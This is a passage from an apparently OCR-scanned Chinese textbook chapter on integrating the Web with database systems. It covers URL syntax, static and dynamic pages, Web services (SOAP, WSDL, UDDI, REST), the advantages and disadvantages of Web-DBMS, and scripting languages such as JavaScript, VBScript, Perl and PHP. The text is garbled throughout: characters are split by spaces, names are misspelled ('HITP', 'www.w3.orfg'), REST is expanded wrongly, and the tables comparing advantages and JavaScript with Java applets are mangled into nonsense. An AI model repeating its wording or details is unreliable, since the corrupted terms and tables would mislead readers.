个 资源 。URL 是 最 常用 的 资源 标识 方案 ， 也 是 HTTP 和 Web 的 基础 。 

URL 的 语法 非常 简单 ， 由 三 部 分 组 成 : 连接 使 用 的 协议 、 主 机 名 以 及 资源 在 主机 上 的 
路 径 名 。 此 外 ，URL 亦 可 选择 为 指定 连接 主机 使 用 的 端口 号 (HTTP 默认 为 端口 80 )， 以 及 
一 个 表示 如 何 把 数据 从 客户 传输 给 服务 器 的 查询 字符 串 〈 例 如 可 以 是 一 个 CGI 脚本 )。URL 
的 语法 如 下 所 示 : 

<protocol>:// <host> [:<port>]/ absolute_path [? arguments] 

<protocol> 指定 浏览 器 使 用 何 种 协议 与 资源 通信 。 一 般 的 访问 方式 包括 : HTTP、S-HTTP 
(Secure HTTP)，file (从 本 地 磁盘 载 人 文件 )、FTP、mailto (发 送 邮 件 给 指定 的 邮件 地 址 )、 
Gopher、NNTP 及 Telnet。 例 如 : 

http://www.w3.org/MarkUp/MarkUp.html 

就 是 一 个 表示 W3C 上 关于 HTML 信息 的 主页 面 的 URL。 协 议 为 HITP， 主 机 名 为 
www.w3.orfg，HTML 文件 的 虚拟 路 径 是 /MarkUp/MarkUp.html。 在 29.4 节能 看 到 一 个 示例 ， 
它 将 查询 串 作 为 URL 的 可 选 参数 部 分 来 传递 。 


29.2.4 ”静态 和 动态 网 页 


存储 在 文件 中 的 HTML 文档 就 是 静态 网 页 的 示例 : 除非 文件 自身 改变 ， 否则 文档 的 内 
容 是 不 变 的 。 相 对 而 言 ， 动 态 网 页 的 内 容 是 在 每 次 访问 的 时 候 产 生 的 。 因 此 动态 网 页 就 可 以 
具有 一 些 静 态 网 页 所 不 具有 的 特性 ， 例 如 : 
® 它 可 以 对 用 户 在 浏览 器 输入 的 信息 作出 响应 。 例 如 ， 在 用 户 完成 表格 输入 或 查询 数 
据 库 之 后 立即 返回 结果 。 
® 它 可 以 为 每 个 用 户 定制 内 容 。 例 如 ， 当 用 户 对 访问 特定 站 点 或 主页 设 定 了 某 些 参数 
(如 感 兴趣 的 领域 或 专业 级 别 ) 时 ， 这 些 信息 可 以 被 保留 ， 并 将 根据 参数 的 设 定 返回 
相应 的 结果 。 
如 果 以 动态 形式 发 布 文档 ， 例 如 在 查询 数据 库 后 返回 响应 数据 ， 则 需要 由 服务 器 来 产 
生 超 文本 。 为 了 实现 这 一 点 ， 可 以 编写 脚本 将 不 同 数据 格式 实时 地 转换 为 HTML 文档 。 这 
些 脚 本 也 应 当 能 够 明白 客户 通过 HTML 表格 所 进行 的 查询 以 及 拥有 数据 的 应 用 程序 (例如 
DBMS) 生成 的 结果 。 由 于 数据 库 是 动态 的 ， 会 在 用 户 执行 创建 、 插 入 、 更 新 及 删除 等 操作 
时 发 生 改 变 ， 因 此 动态 网 页 较 之 静态 方案 来 说 更 为 适合 。 本 书 将 在 29.3 节 至 29.9 节 中 讲述 
创建 动态 网 页 的 方案 。 


29.2.5 ”Web 服务 


近年 来 ，Web 服务 作为 一 个 重要 的 范 型 ， 帮 助人 们 建立 应 用 和 业务 处 理 过 程 ， 以 便于 未 
来 整合 不 同 的 应 用 。 在 此 方面 。Web 服务 基于 开放 标准 ， 致 力 于 人 与 事务 之 间 的 交流 与 合作 。 
与 其 他 基于 Web 的 应 用 不 同 ，Web 服务 没有 用 户 界 面 ， 也 与 浏览 器 无 关 。 相 反 的 ， 它 由 可 
重用 的 软件 组 件 构成 ， 这 些 组 件 被 设计 用 来 为 其 他 应 用 程序 使 用 ， 如 传统 的 客户 应 用 程序 、 
基于 Web 的 应 用 程序 、 其 他 的 Web 服务 等 。 
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对 Web 服务 有 不 同 的 定义 : 如 “打包 为 一 个 实体 的 功能 集合 ， 发 布 到 网 络 上 供 其 他 程 
序 使 用 "， 或 按 W3C 将 Web 服务 定义 为 “支持 网 络 上 机 器 之 间 互 操作 的 软件 系统 ”。Web 服 
务 的 常见 例子 是 股票 报价 工具 ， 其 在 收 到 对 指定 股票 的 报价 请 求 后 ， 返 回 相 应 的 价格 信息 。 
另 一 个 例子 是 微软 制作 开发 的 Web 服务 Map， 它 将 高 质量 的 地 图 、 驾 驶 方向 和 其 他 位 置信 
息 等 功能 都 整合 到 一 个 用 户 应 用 、 业 务 进 程 或 Web 站 点 中 。 

Web 服务 方法 的 核心 是 使 用 到 以 下 被 广泛 接受 的 技术 和 普遍 使 用 的 标准 : 

e XML (eXtensible Markup Language， 扩展 标记 语言 )。 

e SOAP ( Simple Object Access Protocol， 简 单 对 象 访问 协议 )， 基 于 XML 并 用 于 在 

Internet 上 通信 。 

e WSDL ( Web Services Description Language，Web 服务 描述 语言 ) 协议 ， 基 于 XML 
并 用 于 描述 Web 服务 。WSDL 在 界面 层 和 执行 层 之 间 加 入 了 一 个 抽象 层 ， 提 供 一 种 
松 耦 合 服务 ， 增 大 灵活 性 。 

e UDDI (Universal Discovery、Description and Integration， 统 一 化 发 现 、 描 述 和 整合 ) 
协议 ， 用 来 为 预期 的 客户 注册 Web 服务 。 

本 书 将 在 30.3 节 中 讨论 SOAP、WSDL 和 UDDI。Web API 技 术 的 关注 点 不 再 是 基于 
SOAP 的 服务 ， 而 是 更 加 注重 基于 REST (REpresentative State Transfer， 标 志 状 态 迁 移 ) 的 
交互 。REST 服务 不 需要 XML 、SOAP、WSDL 和 UDDI。 关 于 Web 服务 的 相关 规范 和 协议 
仍 处 于 开发 的 早期 阶段 ， 并 不 能 满足 所 有 可 能 的 需求 。 但 是 Web 服务 协作 团体 ( WS-I1)， 这 
个 由 众多 主要 Web 服务 开发 商 组 成 的 组 织 ， 已 经 进行 了 一 系列 案例 研究 、 示 例 应 用 、 场 景 
执行 和 测试 工具 开发 ， 确 保 这 些 规范 和 协议 能 在 不 同 厂商 的 产品 间 使 用 。 


29.2.6 对 Web 与 DBMS 集成 的 需求 


虽然 许多 DBMS 的 供应 商 致力 于 提供 其 数据 库 与 Web 连接 的 专门 方案 ， 但 大 多 数 的 组 
织 机 构 都 需要 一 个 一 般 性 的 解决 方案 ， 而 不 是 被 限制 在 某 一 种 技术 上 。 本 节 将 简要 列 出 对 数 
据 库 应 用 与 Web 集成 最 重要 的 一 些 需 求 。 这 些 需求 是 理想 化 的 ， 在 当前 条 件 下 也 不 可 能 完 
全 实现 ， 一 些 需求 可 能 需要 与 另 一 些 折 中 。 这 些 需 求 包 括 (次 序 不 分 先后 ): 
e 以 安全 的 方式 访问 有 价值 的 企业 数据 的 能 力 。 
e 数据 和 供应 商 独立 连接 的 能 力 ， 从 而 允许 在 需要 的 时 候 可 自由 选择 或 更 换 底 层 数据 
库 系 统 。 
e 独立 于 任何 Web 浏览 器 或 Web 服务 器 的 数据 库 接口 。 
e 连接 方案 能 够 充分 利用 组 织 机 构 的 DBMS 的 所 有 特性 。 
e 开放 式 的 体系 结构 ， 能 够 允许 各 种 系统 和 技术 互 操 作 ， 例 如 支持 : 
昌 不 同 的 Web 服务 器 。 
Microsoft 的 .NET 架构 。 
CORBA/IIOP (Internet Inter-ORB 协议 )。 
Java/RMI (Remote Method Invocation， 远 程 方法 调用 )。 
XML。 
Web 服务 (SOAP，WSDL，UDDI; RESTful) 。 
划算 的 解决 方案 ,允许 在 策略 方向 上 的 可 伸缩 性 、 增 长 和 变化 ， 有 助 于 降低 开发 和 维 
护 应 用 程序 的 费用 。 
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支持 跨越 多 个 HTTP 请 求 的 事务 。 

支持 基于 会 话 和 基于 应 用 的 认证 。 

可 接受 的 性 能 。 

最 少 的 管理 开销 。 

一 个 高 级 开发 工具 集 ， 可 支持 对 应 用 程序 进行 相对 容易 和 快捷 的 开发 、 维 护 及 配置 。 


29.2.7 Web-DBMS 方案 的 优 缺 点 


Web 作为 数据 库 系统 的 平台 能 解决 在 公司 内 和 公司 间 发 布 业务 信息 的 问题 。 遗 憾 的 是 ， 
这 种 方式 也 存在 一 些 缺 点 。 本 节 将 分 析 该 方案 的 优 缺 点 。 





优点 
表 29-2 列 出 了 Web-DBMS 方案 的 优点 。 表 29-2 Web-DBMS 方案 的 优点 
使 用 DBMS 带 来 的 优点 ”本 章 开 始 时 曾 提 到 了 许 使 用 DBMS 带 来 的 优点 
多 网 站 仍然 是 基于 文件 的 ， 每 个 文档 被 存放 在 不 同 的 文 简单 性 
件 中 。 实 际 上 , 一 些 人 已 经 注意 到 世界 上 最 大 的 “数据 平台 无 关 性 
库 ” 万 维 网 却 没有 使 用 或 很 少 使 用 数据 库 技 术 。 本 属相 用 卢 开关 
书 第 1 章 中 就 讨论 了 DBMS 方案 相对 于 其 他 基于 文件 的 村 证 化 
方案 的 优势 (参见 表 1-2 )。 采 用 DBMS 的 许多 优势 对 于 ER 
Web 和 DBMS 的 集成 方案 同样 适用 。 例 如 ， 在 数据 库 和 ee 
HTML 之 间 ， 信 息 同 步 的 问题 已 不 存在 ， 因 为 HTML 页 ee 
面 是 从 数据 库 动态 产生 的 。 这 也 简化 了 系统 的 管理 ， 同 和 


时 也 使 HTML 的 内 容 能 够 享受 到 DBMS 所 有 的 功能 和 
保护 ， 例 如 安全 性 和 完整 性 。 

简单 性 ” HTML 的 设计 初衷 是 设计 一 种 开发 人 员 和 初级 终端 用 户 都 容易 使 用 的 标记 语 
言 。 当 HTML 页 面 的 功能 不 是 过 度 复杂 时 确实 如 此 。 然 而 由 于 HTML 仍 在 不 断 地 扩展 ， 其 
特性 仍 在 不 断 地 改进 ， 而 且 脚本 语言 也 可 被 符 入 HTML 中 ,因此 其 原 有 的 简单 性 现在 已 经 
消失 了 。 

平台 无 关 性 之 所 以 要 创建 基于 Web 的 数据 库 应 用 版 本 ， 最 重要 的 原因 就 是 Web 客户 
端 (浏览 器 ) 是 平台 无 关 的 。 由 于 主要 的 计算 平台 都 支持 浏览 器 功能 ， 因 此 若 使 用 标准 的 
HTML/Java， 应 用 程序 不 需要 更 改 就 可 运行 于 不 同 的 操作 系统 或 Windows 环境 。 与 之 相反 ， 
传统 的 数据 库 客户 需要 做 大 量 的 修改 (即使 不 是 完全 的 重 构 ) 才能 被 移植 到 各 种 平台 上 。 遗 
憾 的 是 , 一些 Web 浏览 器 供应 商 提供 了 专 有 的 特性 ， 因 此 平台 无 关 性 这 一 优点 目前 也 已 不 
存在 了 。 

图 形 用 户 界面 ”使 用 数据 库 的 主要 目的 是 访问 数据 。 在 前 面 的 章节 里 ， 已 经 看 到 数据 库 
可 以 通过 基于 文本 的 、 菜 单 驱动 的 界面 ， 或 通过 编程 界面 (如 满足 SQL 标准 的 编程 界面 ) 访 
间 。 然 而 这 些 界 面 也 是 复杂 和 难以 使 用 的 。 相 对 地 ， 一 个 良好 的 图 形 用户 界 面 ( Graphical 
User Interface，GUI) 应 该 简单 并 且 可 以 提高 数据 访问 效率 。 遗 憾 的 是 ，GUI 会 产生 大 量 的 
编程 量 并 且 依赖 于 具体 平台 ,在 许多 情况 下 甚至 是 依赖 于 具体 供应 商 的 。 相 对 地 ，Web 浏览 
器 提供 了 一 个 容易 使 用 的 GUI 界面 ， 可 以 使 用 它 来 访问 许多 东西 ， 包 括 数 据 库 ， 这 一 点 稍 
后 将 会 简要 介绍 。 通 用 界面 也 可 降低 培训 最 终 用 户 的 费用 。 

标准 化 HTML 是 一 个 所 有 的 Web 浏览 器 都 采用 的 事实 上 的 标准 ， 一 台 机 器 上 的 
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HTML 文档 允许 被 世界 上 任何 机 器 上 的 用 户 通过 Internet 连接 和 Web 浏览 器 来 读 取 。 采 用 
HTML， 对 开发 者 来 说 只 要 学 习 单一 的 语言 ， 对 终端 用 户 来 说 则 总 是 使 用 同一 种 图 形 界面 。 
然而 ， 如 上 所 述 ，HTML 的 这 种 标准 化 正在 被 供应 商 提供 的 专 有 和 不 可 通用 的 特性 逐渐 破 
坏 。 最 近 XML 在 标准 化 上 更 进一步 ， 而 且 正 在 很 快 地 成 为 数据 交换 方面 事实 上 的 标准 。 

跨 平 台 支 持 ”Web 浏览 器 现在 对 每 种 类 型 的 计算 机 平台 都 是 可 用 的 。 这 种 跨 平台 支持 允 
许 用 户 从 世界 各 地 、 从 多 种 类 型 的 计算 机 上 访问 数据 库 。 通 过 这 种 方式 ,信息 可 以 以 最 小 的 
成 本 被 发 布 ， 而 不 需 考虑 对 不 同 硬件 、 操 作 系统 、 软 件 的 兼容 问题 。 

透明 的 网 络 访问 ”Web 的 主要 优点 是 网 络 访问 对 用 户 透明 ， 除 了 指定 URL 外 ， 所 有 的 
操作 都 是 由 Web 浏览 器 和 Web 服务 器 处 理 。 内 置 的 网 络 支持 大 大 简化 了 数据 访问 ， 不 再 需 
要 使 用 昂贵 的 网 络 软件 ， 也 降低 了 不 同 平台 之 间 交 互 的 复杂 性 。 

可 伸缩 的 配置 ”传统 的 两 层 客户 - 服务 器 体系 结构 导致 “ 胖 ” 客 户 端的 产生 ， 这 使 得 
用 户 界面 和 应 用 逻辑 都 缺乏 效率 。 对 比 而 言 ， 基 于 Web 的 解决 方案 趋向 于 创建 更 自然 的 三 
层 体 系 结构 ， 这 为 可 缩放 性 提供 了 基础 。 通 过 在 单独 的 应 用 服务 器 而 不 是 客户 端 上 存储 应 用 
程序 ， 减 少 了 应 用 程序 配置 的 时 间 和 成 本 。 它 简化 了 升级 处 理 和 多 平台 交叉 应 用 的 管理 。 现 
在 ， 可 从 世界 上 的 任意 站 点 访问 和 使 用 应 用 程序 服务 器 上 的 应 用 程序 。 从 商业 角度 ， 对 服务 
器 端 应 用 程序 的 全 球 访 问 能 力 提 供 了 创建 新 服务 和 开拓 新 的 客户 群 的 可 能 性 。 

新 技术 ”作为 一 个 Internet 平台 ，Web 使 得 各 个 组 织 机 构 可 以 通过 全 球 可 访问 的 应 用 程 
序 提供 新 的 服务 ， 争 取 到 新 的 客户 。 早 先 基于 主机 或 传统 的 客户 - 服务 器 系统 以 及 群 件 应 用 都 
无 法 提供 这 种 便利 。 在 过 去 的 十 年 间 ， 我 们 目睹 了 Web 上 B2B 和 B2C 交易 的 拓展 。 在 Web 
及 其 相关 技术 的 迅猛 发 展 之 前 ， 我 们 是 不 可 能 看 到 这 些 新 的 市 场 策略 和 商业 贸易 模式 的 。 

缺点 

表 29-3 列 出 了 Web-DBMS 方案 的 缺点 。 表 29-3 Web-DBMS 方案 的 缺点 

缺乏 可 靠 性 Internet 目前 还 是 不 可 靠 、 传输 速度 一 oe 


缺乏 可 靠 性 
缓慢 的 通信 媒介 ， 当 一 个 请 求 在 Internet 中 传递 时 ， 无 et 
法 确保 投递 的 完成 (例如 ， 在 服务 器 崩溃 时 就 无 法 成 功 二 
发 送 )。 当 用 户 试图 在 服务 器 显著 过 载 的 高 峰 时 期 访问 Sr 
服务 器 上 的 信息 ， 或 者 使 用 特别 缓慢 的 网 络 时 就 会 出 re 
现 一 些 困 难 。Internet 的 可 靠 性 是 一 个 难题 ， 需 要 一 段 ee 
时 间 来 解决 。 和 安全 性 一 样 ， 可 靠 性 也 是 各 组 织 机 构 在 
关键 应 用 上 仍然 依赖 于 它们 自己 的 内 联网 而 不 是 公有 
Internet 的 原因 。 私 有 的 内 联网 受 组 织 机 构 控制 ， 认 为 A 
必要 时 就 能 自由 地 维护 或 改善 它 。 二 


安全 性 问题 ”安全 性 是 所 有 把 数据 库 放 在 Web 上 提 
供 访问 的 组 织 机 构 都 十 分 关注 的 事情 。 由 于 大 量 匿名 用 户 的 存在 ， 用 户 认 证 和 安全 数据 传输 
就 变 得 十 分 关键 。 本 书 在 20.5 节 中 讨论 了 Web 安全 性 。 | 

费用 昂贵 与 人 们 通常 的 看 法 不 同 ,维持 一 个 有 价值 的 Internet 站 点 的 成 本 是 非常 昂贵 
的 ， 特 别 是 当 用 户 的 需求 和 期 望 还 在 不 断 增长 的 时 候 。 例 如 福 里 斯 特 研 究 室 指出 商业 网 站 的 
构建 成 本 从 30 万 美元 到 340 万 美元 不 等 ， 具 体 数 目 依 赖 于 组 织 机 构建 立 站 点 的 目的 。 该 研 
究 室 预测 其 费用 将 在 未 来 几 年 间 以 50% 至 200% 的 速度 增长 。 达 到 这 个 范围 最 高 值 的 是 那些 
销售 产品 和 经 营 投递 业务 的 网 站 ，20% 的 费用 消耗 在 软件 和 硬件 上 ，28% 消耗 在 站 点 的 市 场 


212 淄 八 部 分 Web 与 DBMS 


推销 上 ，56% 消耗 在 站 点 内 容 的 开发 上 。 很 明显 ， 很 难 降低 这 些 Web 材料 的 开发 费用 ， 然 
而 使 用 先进 的 工具 和 连接 中 间 件 ， 则 有 可 能 大 幅度 地 削减 技术 开发 费用 。 

可 伸缩 性 差 Web 应 用 程序 可 能 面 对 不 可 预测 的 和 潜在 的 巨 量 峰值 负载 。 这 需要 开发 具 
有 可 伸缩 性 的 高 性 能 服务 器 体系 结构 。 一 种 被 称 为 “Web 农场 ”的 技术 可 以 提高 可 伸缩 性 ， 
允许 两 个 或 多 个 服务 器 构成 同一 个 站 点 。HTTP 请 求 以 罗 宾 环 ( round-robin) 的 方式 被 路 由 
到 “农场 ”中 的 每 个 服务 器 上 ， 这 样 可 以 均匀 分 布 负载 并 允许 站 点 处 理 更 多 的 请 求 。 然 而 ， 
这 可 能 导致 维持 状态 信息 变 得 更 加 复杂 。 

HTML 的 功能 有 限 虽然 超 文 本 提供 了 普遍 和 容易 使 用 的 界面 ,但 这 种 简单 性 也 意味 
着 ,一 些 高 度 交互 的 数据 库 应 用 不 能 被 轻松 地 转换 为 对 用 户 同 样 友 好 的 基于 Web 的 应 用 程 
序 。 如 在 29.3 节 所 讨论 的 那样 ， 可 以 使 用 JavaScript 和 VBScript 这 样 的 脚本 语言 ， 或 者 使 
用 Java 或 ActiveX 组 件 为 Web 页 面 添加 额外 的 功能 ， 但 是 这 些 技术 对 于 初级 入 门 用 户 来 说 
大 多 过 于 复杂 。 此 外 ， 下 载 和 执行 这 些 代 码 都 需要 增加 一 些 性 能 开销 。 

无 状态 ”如同 在 29.2.1 节 所 提 到 的 那样 ，Web 环境 目前 的 无 状态 特性 使 得 数据 库 连接 及 
用 户 事务 的 管理 都 变 得 困难 ， 需 要 应 用 程序 维护 管理 额外 的 信息 。 然 而 ， 近 来 的 Web 服务 
器 技术 简化 了 这 一 问题 。 

带宽 目前， 局域网 上 数据 包 传输 的 速率 对 于 以 太 网 来 说 可 达到 100M 位 /s (bps)， 对 
于 ATM 来 说 可 达到 2.5G 位 /s。 比 较 而 言 ， 在 Internet 最 快 的 那 一 部 分 ， 包 传输 的 速率 也 只 
能 达到 1.544M 位 /s。 因 而 带宽 是 Internet 受 限 的 资源 ， 但 即使 是 最 简单 的 任务 〈 例 如 处 理 
表格 ) 也 要 跨 网 络 来 调用 服务 器 ， 这 使 得 带宽 问题 变 得 更 复杂 。 

性 能 不 足 复杂 的 Web 数据 库 客 户 端的 组 件 大 部 分 是 基于 解释 型 语言 的 ， 这 使 得 它们 
比 传统 的 数据 库 客 户 端 更 慢 ， 因 为 传统 的 数据 库 客户 端 是 本 地 编译 的 。 例 如 HTML 必须 被 
Web 浏览 器 解释 执行 ; JavaScript 和 VBScript 是 扩展 了 HTML 编程 结构 的 解释 型 脚本 语言 ; 
Java applet 则 要 被 编译 成 字 节 码 ， 然 后 再 把 字 节 码 下 载 到 浏览 器 端 。 对 于 时 间 敏 感 的 应 用 ， 
解释 语言 所 带 来 的 开销 是 无 法 容忍 的 。 不 过 还 好 有 更 多 的 应 用 对 时 间 不 是 那么 敏感 。 

开发 工具 不 完善 构建 Web 数据 库 应 用 的 开发 者 已 经 很 快 发 现 了 目前 可 用 的 开发 工具 
并 不 完善 。 直 到 目前 为 止 ， 绝 大 多 数 的 Internet 开发 仍然 在 使 用 第 一 代 编 程 语言 ， 其 开发 环 
境 比 文本 编辑 器 强 不 了 多 少 。 而 开发 人 员 普 遍 期 待 成 熟 的 图 形 开 发 环境 ， 这 已 经 严重 阻碍 
了 Internet 的 开发 。 在 过 去 的 几 年 中 人 们 已 经 为 此 做 了 大 量 的 工作 ， 开 发 环境 正 变 得 越 来 越 
成 熟 。 

目前 在 这 方面 已 出 现 了 许多 互相 竞争 的 技术 ,但 是 哪 种 技术 更 有 前 途 现在 还 不 明确 ， 对 
此 在 本 章 后 面 的 小 节 中 还 会 介绍 。 也 无 法 预计 哪 种 技术 对 于 哪 种 应 用 程序 会 更 好 。 如 同 在 第 
24 章 分 布 式 DBMS 和 第 27 章 面向 对 象 DBMS 中 讨论 的 那样 ， 人 们 在 Web 数据 库 应 用 上 所 拥 
有 的 经 验 还 远 远 不 如 在 传统 的 其 他 类 型 应 用 上 的 经 验 多 。 随 着 时 间 的 推移 ， 这 一 点 会 得 到 弥补 。 

上 面 所 讨论 的 许多 优 缺 点 都 只 是 暂时 的 。 一 些 优点 可 能 随 着 时 间 而 消失 ， 比 如 HTML 
就 正在 变 得 越 来 越 复杂 。 类 似 地 ， 一 些 缺 点 也 可 能 会 消失 ， 例 如 Web 技术 正在 变 得 更 加 完 
善 和 更 易 理解 。 当 尝试 开发 基于 Web 的 数据 库 应 用 时 ， 应 该 强调 的 是 工作 环境 正 处 在 不 断 
的 变化 之 中 。 


29.2.8 集成 Web 与 DBMS 的 方法 
下 面 将 介绍 当前 流行 的 一 些 数据 库 与 Web 环境 集成 的 方法 : 
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脚本 语言 ， 例 如 JavaScript 和 VBScript 等 。 

公共 网 关 接口 (CGI)， 一 种 早期 技术 ， 可 能 是 使 用 最 广 的 技术 之 一 。 

HTTP cookie。 

Web 服务 器 扩展 技术 ， 例 如 Netscape API (NSAPI) 和 Microsoft IIS API (ISAPI) 。 
Java、 JEE、 JDBC、 SQLJ、 JDO、JPA、Servlet 和 JSP (JavaServer Pages)。 
Microsoft 的 Web 解决 方案 平台 ， 包 括 .NET、ASP ( Active Server Pages) 和 ADO 
(ActiveX Data Objects ) 。 

e Oracle 的 Internet 平台 。 

这 并 不 是 一 份 所 有 可 用 解决 方案 的 完整 清单 。 在 随后 几 节 中 将 介绍 一 些 可 以 采用 的 解决 
方案 和 每 个 方案 的 优 缺 点 。Web 是 不 断 变 化 的 ， 在 下 面 所 讨论 的 技术 有 可 能 在 很 短 时 间 内 就 
已 经 陈旧 过 期 ， 但 是 仍 希 望 能 够 对 Web 和 DBMS 的 集成 作出 一 些 有 价值 的 预见 。 在 讨论 中 
没有 讲述 传统 的 搜索 机 制 如 WAIS 网 关 (Kahle 和 Medlar，1991 )， 以 及 Google 、Yahoo! 和 
MSN 等 搜索 引擎 。 它 们 是 基于 文本 的 搜索 引擎 ， 能 够 支持 基于 关键 字 的 搜索 。 


29.3 ”脚本 语言 


本 节 主 要 学 习 如 何 通过 使 用 脚本 语言 来 扩展 浏览 器 和 Web 服务 器 的 能 力 ， 使 其 能 提供 
额外 的 数据 库 功 能 。 可 能 已 经 注意 到 ，HTML 自身 的 限制 使 得 哪怕 是 最 简单 的 应 用 程序 都 变 
得 很 复杂 。 脚 本 引擎 是 解决 浏览 器 端 无 法 编写 应 用 代码 这 一 问题 的 一 种 方法 。 由 于 脚本 代码 
嵌入 在 HTML 中 ， 它 在 该 页 面 每 次 被 访问 时 下 载 到 客户 端 。 更 新 浏览 器 里 的 页 面 仅 需 简单 
地 改变 服务 器 上 的 Web 文档 就 可 以 了 。 

脚本 语言 允许 将 创建 的 应 用 代码 租 和 人 到 HTML 代码 中 。 这 能 够 自动 化 各 种 处 理 流程 ， 
也 可 以 访问 和 操作 对 象 。 可 以 使 用 标准 的 程序 逻辑 ， 例 如 循环 、 条 件 语 句 以 及 数学 操作 来 编 
写 程序 。 一 些 脚 本 语言 也 可 以 快速 地 创建 HTML， 可 以 通过 脚本 基于 用 户 的 选择 或 输入 来 创 
建 自 定义 的 HTML 页 面 ， 而 无 须 访问 存储 在 Web 服务 器 的 脚本 来 构建 必需 的 页 面 。 

这 个 领域 的 大 多 数 研 究 成 果 都 集中 在 Java 上 ，29.7 节 将 讨论 这 一 技术 。 然 而 大 多 数 最 
常用 的 功能 可 能 使 用 JavaScript、VBScript、Perl 和 PHP 等 脚本 引擎 就 可 以 实现 。 它 们 通过 
只 实现 关键 的 功能 来 保持 “ 瘦 ” 客 户 应 用 ， 并且 推动 了 快速 的 应 用 程序 开发 。 这 些 语言 是 解 
释 型 而 不 是 编译 型 的 ， 能 够 容易 地 使 用 它们 构建 小 型 应 用 程序 。 


29.3.1 JavaScript 和 JScript 


JavaScript 和 JScript 事实 上 是 同样 的 解释 型 脚本 语言 ， 分 别 来 自 于 Netscape 和 Microsoft。 
Microsoft 的 JSeript 是 被 广泛 使 用 的 JavaScript 的 复制 品 。 两 种 语言 的 源 代码 都 可 直接 被 浏 
览 器 解释 ， 并 允许 在 HTML 文档 中 编写 。 这 些 脚 本 可 以 在 浏览 器 内 执行 ， 也 可 以 在 服务 器 
端 发 送 文档 到 浏览 器 之 前 执行 。 两 者 结构 是 相同 的 ， 区 别 是 在 服务 器 端 具 有 额外 的 功能 ， 例 
如 数据 库 互 联 。 

JavaScript 是 一 种 基于 对 象 的 脚本 语言 ， 它 来 自 于 Netscape 和 Sun 的 一 个 联合 开发 项 
目 ， 最 后 成 为 Netscape 的 Web 脚本 编程 语言 。 它 是 非常 简单 的 编程 语言 ， 人 允许 HTML 页 面 
包含 可 以 识别 和 响应 鼠标 点 击 、 用 户 输入 、 页 面 浏览 等 用 户 事件 的 函数 和 脚本 。 这 些 脚 本 
可 以 以 相对 较 小 的 编程 量 实现 复杂 的 Web 页 面 行为 。JavaScript 语言 类 似 于 Java 语言 ( 参 
见 29.7 节 ), 但 是 不 具有 Java 的 静态 类 型 和 强 类 型 检查 。 与 Java 根据 声明 构建 类 这 样 的 编 
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译 时 系统 ，JavaScript 支持 运行 时 系统 ， 依 赖 于 表示 数字 、 布 尔 和 字符 串 值 等 几 个 较 小 数 
目的 数据 类 型 。JavaScript 通过 允许 脚本 开发 者 使 用 Java applet 的 一 些 有 用 特性 实现 Java。 
JavaScript 语句 可 以 获取 并 设置 applet 的 属性 ， 从 而 查询 状态 或 是 调节 applet 和 内 置 控件 的 
性 能 。 表 29-4 比较 了 JavaScript 和 Java applet。 


表 29-4 JavaScript 和 Java applet 的 比较 


JavaScript Java (applets) 
客户 端 解释 (不 编译 ) 在 客户 端 运 行 前 先 在 服务 器 端 编译 
竺 类 放学 的。 人 型 全 用 由 时 的 、 可 扩 绒 的。 但 是 不 支 面向 对 象 的 。applet 由 支持 继承 的 对 象 类 组 成 。 
代码 集成 并 网 入 HTML 中 applet 和 HTML 是 分 离 的 (可 从 HTML 页 面 上 访问 applet) 
变量 数据 类 型 无 须 声明 (松散 类 型 ) 变量 数据 类 型 必须 被 声明 ( 强 类 型 ) 
动态 绑 定 。 对 象 引用 在 运行 时 检查 静态 绑 定 。 对 象 引用 必须 在 编译 时 有 效 
不 能 自动 写 硬盘 不 能 自动 写 硬盘 


29.3.2 VBScript 


VBScript 是 Microsoft 专 有 的 解释 型 脚本 语言 ， 其 目的 和 操作 与 JavaScript/JScript 是 一 
样 的 。 但 目前 Firefox 、Opera 等 浏览 器 不 支持 VBScript。 然 而 ，VBScript 的 语法 更 像 Visual 
Basic 而 不 是 Java。 它 直接 对 源 代 码 进 行 解 释 运 行 ， 并 且 支 持 在 HTML 内 编写 脚本 。 同 
JavaScript/JScript 一 样 ，VBScript 可 以 直接 在 浏览 器 内 执行 ， 或 者 在 文档 被 发 送 到 客户 端 前 
在 服务 器 端 运行 。 

VBScript 是 一 种 过 程 语 言 ， 它 使 用 子 例 程 作为 基本 单元 。VBScript 源 自 数 年 前 提出 的 
一 种 编程 语言 Visual Basic。Visual Basic 是 Microsoft Office 组 件 ( Word、Access、Excel 和 
PowerPoint) 的 基础 编程 语言 。Visual Basic 是 基于 组 件 的 ， 这 即 是 说 Visual Basic 程序 的 构 
建 方式 是 首先 把 组 件 放 置 到 表格 中 ， 然 后 再 使 用 Visual Basic 语言 连接 起 来 。Visual Basic 也 
促进 了 ActiveX 控件 的 前 身 一 一 Visual Basic 组 件 (VBX) 的 诞生 。 

VBX 共享 一 个 公共 接口 ， 可 以 通过 这 个 接口 把 VBX 放置 到 Visual Basic 表格 中 。 这 是 
一 种 使 用 最 广泛 的 基于 组 件 的 软件 。VBX 后 来 被 OLE 控件 (OCX) 所 取代 ，OLE 控件 后 
来 改名 为 ActiveX。 当 Microsoft 对 Internet 感 兴趣 后 ， 他 们 把 OCX 改 为 ActiveX 并 且 模 仿 
Visual Basic 创建 了 VBScript。Visual Basic 和 VBScript 的 主要 区 别 是 VBScript 改进 了 安全 
性 。VBScript 没有 能 访问 用 户 机 器 上 文件 的 函数 。 


29.3.3 Perl 和 PHP 


Perl ( Practical Extraction and Report Language) 是 一 种 高 级 的 解释 型 编程 语言 ， 它 具有 
广泛 、 易 用 的 文本 处 理 能 力 。Perl 结合 了 C 和 UNIX 工具 sed、awk 和 sh 的 特性 ， 它 是 对 
UNIX shell 脚本 的 有 力 增 强 。Perl 最 开始 是 数据 规约 语言 ， 可 以 访问 文件 系统 、 扫 描 文本 、 
使 用 模式 匹配 和 文本 操作 机 制 生成 报告 。 这 个 语言 设计 目的 是 为 了 建立 一 种 协调 的 机 制 用 来 
创建 和 控制 文件 及 过 程 、 网 络 套 接 字 、 数 据 连通 性 ， 以 及 支持 面向 对 象 特性 。 现 在 已 成 为 使 
用 最 为 广泛 的 服务 器 端 编程 语言 。 虽 然 Perl 最 开始 是 在 UNIX 平台 上 开发 的 ， 它 却 一 直 被 
视 为 多 平台 的 语言 ， 现 在 还 推出 了 Perl 的 Windows 平台 版 本 ( 称 为 ActivePerl) 。 

PHP ( Hypertext Preprocessor) 是 另 一 种 流行 的 开放 源 代 码 的 HTML 髋 入 式 脚 本 语言 。 
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它 被 许多 Web 服务 器 所 支持 ， 包 括 Apache HTTP Server 和 Microsoft IIS， 它 也 是 首选 的 
